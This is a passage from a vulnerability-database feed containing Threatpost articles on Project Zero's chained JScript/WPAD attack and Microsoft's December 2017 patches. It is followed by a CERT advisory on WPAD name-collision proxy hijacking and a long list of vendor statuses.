JScript.dll used by the WPAD service. ([CVE-2017-11810](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11810>), [CVE-2017-11903](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11903>), [CVE-2017-11793](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11903>), [CVE-2017-11890](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11890>), [CVE-2017-11907](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11907>), [CVE-2017-11855](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11907>) and [CVE-2017-11906](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11906>))\n\nFive of the vulnerabilities outlined by Project Zero on Monday were patched last week as part of [Microsoft\u2019s Patch Tuesday](<https://threatpost.com/microsoft-december-patch-tuesday-update-fixes-34-bugs/129154/>). The additional two were [patch in October](<https://threatpost.com/microsoft-patches-office-bug-actively-being-exploited/128367/>) by Microsoft.\n\n\u201cIn recent years, browser exploits have mutated from being primarily DOM-oriented to targeting Javascript engines directly, so the mere mention that we can get Javascript execution over the network without the browser was motivating,\u201d wrote co-authors of the Project Zero report Ivan Fratric, Thomas Dullien, James Forshaw and Steven Vittitoe.\n\nResearchers chained two specific JScript bugs (an infoleak and a heap overflow) and leveraged several other techniques (such as return-oriented programming) to bypass Windows security mitigations. Next, researchers used a privilege escalation technique to move from the Local Service account (where the WPAD service runs, but doesn\u2019t have many permissions) to SYSTEM, according to an analysis of the technique by Stone.\n\n\u201cThe chain requires all its links in order to work, but still, in my opinion the memory read primitive (out-of-bounds read) is the enabler to all the other steps, and has usability beyond this particular chain,\u201d said Amit Klein, vice president of security research at SafeBreach.\n\nDespite the fact Microsoft has patched against this type of attack, Project Zero researchers agree with Klein\u2019s assessment.\n\n\u201cSince the bugs are now fixed, does this mean we are done and can go home? Unlikely. Although we spent a fair amount of time, effort and compute power on finding jscript.dll bugs, we make no claims that we found all of them. In fact, where there are 7 bugs, there is likely to be an 8th,\u201d Project Zero researchers wrote.\n\nResearchers recommend Microsoft users disable WPAD by default and sandbox the JScript interpreter inside the WPAD service.\n\nResearchers point out that Windows isn\u2019t the only software that implements WPAD. However, other implementations in other operating systems don\u2019t enable it by default. They also note, \u201cGoogle Chrome also has a WPAD implementation, but in Chrome\u2019s case, evaluating the JavaScript code from the PAC file happens inside a sandbox.\u201d\n", "cvss3": {}, "published": "2017-12-19T11:00:13", "type": "threatpost", "title": "Project Zero Chains Bugs for \u2018aPAColypse Now\u2019 Attack on Windows 10", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11793", "CVE-2017-11810", "CVE-2017-11855", "CVE-2017-11890", "CVE-2017-11903", "CVE-2017-11906", "CVE-2017-11907"], "modified": "2017-12-19T11:00:13", "id": "THREATPOST:889F51C6964835BFE33F9D16F1C53205", "href": "https://threatpost.com/project-zero-chains-bugs-for-apacolypse-now-attack-on-windows-10/129193/", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-23T05:28:00", "description": "Microsoft patched 34 vulnerabilities that are part of its December Patch Tuesday release. A total of 20 vulnerabilities were rated critical and another 12 were rated important. Impacted are Internet Explorer, Microsoft Edge, Microsoft Windows, Microsoft Office, SharePoint and Exchange.\n\nNotable patches include two ([CVE-2017-11937](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11937>) and [CVE-2017-11940](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11940>)) fixes impacting Microsoft\u2019s Malware Protection Engine (MPE). Both[ remote code execution vulnerabilities](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11937>) became known last week via research by the UK National Cyber Security Centre. Both were patched last week.\n\n\u201cThese MPE vulnerabilities also affect Exchange Server, so back-end administrators do have some work to do this month,\u201d said Greg Wiseman, senior security researcher at Rapid7.\n\n\u201cThe biggest thing going on this month are bugs relating to Internet Explorer. Over half the CVEs this month are affecting IE and Edge,\u201d said Chris Goettl, product manager, Ivanti. Over twenty of the 34 vulnerabilities are classified as a \u201cscripting engine memory corruption vulnerability\u201d impacting Microsoft browsers.\n\nOne scripting engine memory corruption vulnerabilities ([CVE-2017-11907](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11907>)) is a remote code execution bug that exists when IE improperly accesses objects in memory. \u201cAn attacker could host a specially crafted website designed to exploit the vulnerability through Internet Explorer and then convince a user to view the website,\u201d [wrote Microsoft](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11907>). A successful exploit of the vulnerability gives the attacker the same user rights as the current user.\n\n\u201cIt doesn\u2019t take sophisticated social engineering tactics to convince most users to visit a malicious web page, or a legitimate, but compromised, website (as in a watering hole attack). If the user is browsing with an unpatched version of Internet Explorer or Edge, an attacker could execute arbitrary code. If the user has administrative rights, it\u2019s game over and the attacker could take full control of the system,\u201d Wiseman said.\n\nSecurity experts are also recommending admin prioritize a patch for a Microsoft Excel remote code execution vulnerability ([CVE-2017-11935](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-11935>)) affecting Microsoft Office 2016. \u201cDue to an error in the way Microsoft Office improperly handles objects in memory while parsing specially crafted files,\u201d according to the CVE description. A remote attacker can exploit this issue by enticing a victim to open a specially crafted file, according to the CVE record.\n\n\u201cThis vulnerability gives the attacker full control of the system. All I need to do is convince somebody to either open an attachment or come to my specially crafted website and download some content,\u201d Goettl said. \u201cClick-rates today are high. User are still the weakest security link. This is probably the one vulnerability that I would say is most likely to be exploited this month.\u201d\n\nMicrosoft said none of the security issues that are part of Patch Tuesday security bulletin have been publicly disclosed or exploited.\n\nMeanwhile researchers at the Zero Day Initiative are recommending special attention to a Windows information disclosure vulnerability bug ([CVE-2017-11927](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11927>)). \u201cThis bug takes us all the way back to the early days of Internet Explorer and CHM (compressed help) files. This patch resolves an information disclosure vulnerability in the Windows its:// protocol handler,\u201d [notes ZDI in a blog post](<https://www.thezdi.com/blog/2017/12/12/the-december-2017-security-update-review>).\n\nMicrosoft describes the [information disclosure vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11927>) as a bug that exists when the Windows its:// protocol handler \u201cunnecessarily sends traffic to a remote site in order to determine the zone of a provided URL.\u201d Doing so could inadvertently expose sensitive user information to a malicious site.\n\n\u201cAn attacker who successfully tricked a user into disclosing the user\u2019s NTLM hash could attempt a brute-force attack to disclose the corresponding hash password,\u201d Microsoft wrote.\n", "cvss3": {}, "published": "2017-12-12T17:12:36", "type": "threatpost", "title": "Microsoft December Patch Tuesday Update Fixes Six Critical Bugs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11907", "CVE-2017-11927", "CVE-2017-11935", "CVE-2017-11937", "CVE-2017-11940"], "modified": "2017-12-12T17:12:36", "id": "THREATPOST:B332E36B927835B6FDC7AD4DB93CE28C", "href": "https://threatpost.com/microsoft-december-patch-tuesday-update-fixes-34-bugs/129154/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cert": [{"lastseen": "2021-09-28T17:49:57", "description": "### Overview\n\nAutomatic DNS registration and autodiscovery functionality provides an opportunity for the misconfiguration of networks, resulting in a loss of confidentiality and integrity of the network if an attacker on the network adds a specially configured proxy device.\n\n### Description\n\nThe Web Proxy Automatic Discovery (WPAD) protocol is used to automatically provide proxy configuration information to devices on a network. Clients issue a special DHCP request to obtain the information for the proxy configuration, but will fall back on a DNS request to one of several standardized URLs making use of the subdomain name of \u201cwpad\u201d if a DHCP response is unavailable.\n\nAn attacker with local area network (LAN) access may be able to add a device with the name \u201cwpad\u201d to the network, which may produce a collision with a standardized WPAD DNS name. Many customer premise home/office routers (including, but not limited to, Google Wifi and Ubiquiti UniFi) automatically register device names as DNS A records on the LAN, which may allow an attacker to utilize a specially named and configured device to act as a WPAD proxy configuration server. The attacker-served proxy configuration can result in the loss of confidentiality and integrity of any network activity by any device that utilizes WPAD. \n \nOther autodiscovery names such as ISATAP may also be exploitable. \n \n--- \n \n### Impact\n\nAn attacker, with access to the network, could add a malicious device to the network with the name \"WPAD\". This attacker may be able to utilize DNS auto-registration and auto-discovery to act as a proxy for victims on the network, resulting in a loss of confidentiality and integrity of network activity. \n \n--- \n \n### Solution\n\n` \n` \n \n--- \n \nHome/office LAN/WLAN routers should not auto-register to their local DNS magic names related to auto-configuration and auto-discovery features should not accept mDNS based names as authoritative sources. \n \nApply the vendor patch. \n \n--- \n \n### Vendor Information\n\n598349\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### ADTRAN __ Affected\n\nNotified: July 18, 2018 Updated: September 04, 2018 \n\n**Statement Date: August 30, 2018**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nADTRAN has affected products and their advisory will be available at the vendor web site.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://supportforums.adtran.com/docs/DOC-9269>\n\n### MikroTik Affected\n\nNotified: July 18, 2018 Updated: September 19, 2018 \n\n**Statement Date: September 10, 2018**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Pi-Hole Affected\n\nUpdated: October 01, 2018 \n\n**Statement Date: September 08, 2018**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Synology __ Affected\n\nNotified: July 18, 2018 Updated: September 05, 2018 \n\n**Statement Date: July 20, 2018**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\n`Synology `has prepared updates to the majority of their products to fix this vulnerability. Please check [`https://www.synology.com/en-global/support/security/Synology_SA_18_53`](<https://www.synology.com/en-global/support/security/Synology_SA_18_53>).\n\n### Vendor References\n\n * [httpDSM6.2.1-23824](<httpDSM6.2.1-23824>)\n * <https://www.synology.com/en-us/releaseNote/RT2600ac\nSRM1.1.7-6941-2>\n * <https://www.synology.com/en-us/releaseNote/FS3017>\n\n### Addendum\n\nSynology has released updates to our majority products for fixing the vulnerability: \n`List of affected products:`` ``<https://www.synology.com/en-global/support/security/Synology_SA_18_53>` \n\\- DSM 6.2.1-23824 (<https://www.synology.com/en-us/releaseNote/FS3017>) \n\\- SRM 1.1.7-6941-2 (<https://www.synology.com/en-us/releaseNote/RT2600ac>) \n \nWe will publish a security advisory after public disclosure. Thank you. \n \n\\- Synology Security Team. \n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23598349 Feedback>).\n\n### TippingPoint Technologies Inc. __ Affected\n\nNotified: July 18, 2018 Updated: October 23, 2018 \n\n**Statement Date: October 08, 2018**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\n`The WPAD attack mechanism is not filterable by TippingPoint.However, the Jscript payload is filterable. \n \nHere is the list of JS vulnerabilities from Project Zero \n \nThe WPAD attack mechanism is not filterable by TippingPoint. However, the Jscript payload is filterable. \n \nHere is the list of JS vulnerabilities from Project Zero + our filters \n \n--------------------------------------- \n| Google ID | CVE | SigKB | \n--------------------------------------- \n| 1376 | CVE-2017-11903 | 30079 | \n| 1340 | CVE-2017-11810 | 29707 | \n| 1381 | CVE-2017-11793 | 29705 | \n| 1369 | CVE-2017-11890 | 30068 | \n| 1383 | CVE-2017-11907 | 30081 | \n| 1378 | CVE-2017-11855 | 29918 | \n| 1382 | CVE-2017-11906 | - | \n---------------------------------------`\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Ubiquiti Networks __ Affected\n\nNotified: July 18, 2018 Updated: September 06, 2018 \n\n**Statement Date: September 05, 2018**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nThe recently launched UniFi Security Gateway firmware (4.4.28) that fix the vulnerability \"VU#598349\":\n\n \n<https://community.ubnt.com/t5/UniFi-Updates-Blog/USG-Firmware-v4-4-28-now-available/ba-p/2482349>. \n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://community.ubnt.com/t5/UniFi-Updates-Blog/USG-Firmware-v4-4-28-now-available/ba-p/2482349>\n\n### Ceragon Networks Inc __ Not Affected\n\nNotified: July 18, 2018 Updated: August 22, 2018 \n\n**Statement Date: August 02, 2018**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nNot Affected.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Check Point Software Technologies __ Not Affected\n\nNotified: July 18, 2018 Updated: July 20, 2018 \n\n**Statement Date: July 19, 2018**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\n`Check Point Software Technologies is not vulnerable to this.`\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Juniper Networks __ Not Affected\n\nNotified: July 18, 2018 Updated: July 20, 2018 \n\n**Statement Date: July 19, 2018**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nThank you for sending us this report. As per our initial assessment, Juniper routers are unaffected since they do not consider host names provided in DHCP requests. If our devices are found vulnerable we will take steps to fix them and publish advisories on or after public disclosure of this issue.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### NLnet Labs __ Not Affected\n\nNotified: July 18, 2018 Updated: July 23, 2018 \n\n**Statement Date: July 23, 2018**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\n`Since NSD does not have DHCP DNS registration and autodiscovery functionality, we need to take no action. So NSD is not vulnerable. `\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### 3com Inc Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### 8e6 Technologies Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### A10 Networks Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### ACCESS Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### ANTlabs Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### ARRIS Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### ASP Linux Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### AT&T Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### AVM GmbH Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Actelis Networks Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Actiontec Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Aerohive Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### AhnLab Inc Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### AirWatch Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Akamai Technologies, Inc. Unknown\n\nNotified: July 23, 2018 Updated: July 23, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Alcatel-Lucent Enterprise Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Alpha Networks Inc Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Alpine Linux Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Alvarion Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Amazon Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Android Open Source Project Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Aperto Networks Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Appgate Network Security Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Apple Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Arch Linux Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Arista Networks, Inc. Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Aruba Networks Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### AsusTek Computer Inc. Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Atheros Communications, Inc. Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Avaya, Inc. Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Barnes and Noble Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Barracuda Networks Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Belkin, Inc. Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Bell Canada Enterprises Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Bit9 Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### BlackBerry Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Bloxx Ltd Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Blue Coat Systems Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### BlueCat Networks, Inc. Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Blunk Microsystems Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Broadcom Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Brocade Communication Systems Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### BullGuard Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### CA Technologies Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### CMX Systems Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Cambium Networks Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### CentOS Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Cirpack Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Cisco Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Comcast Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Command Software Systems Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Contiki OS Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### CoreOS Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Cradlepoint Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Cricket Wireless Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### D-Link Systems, Inc. Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Debian GNU/Linux Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Dell Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Dell EMC Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Dell SecureWorks Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### DesktopBSD Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Deutsche Telekom Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Devicescape Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### 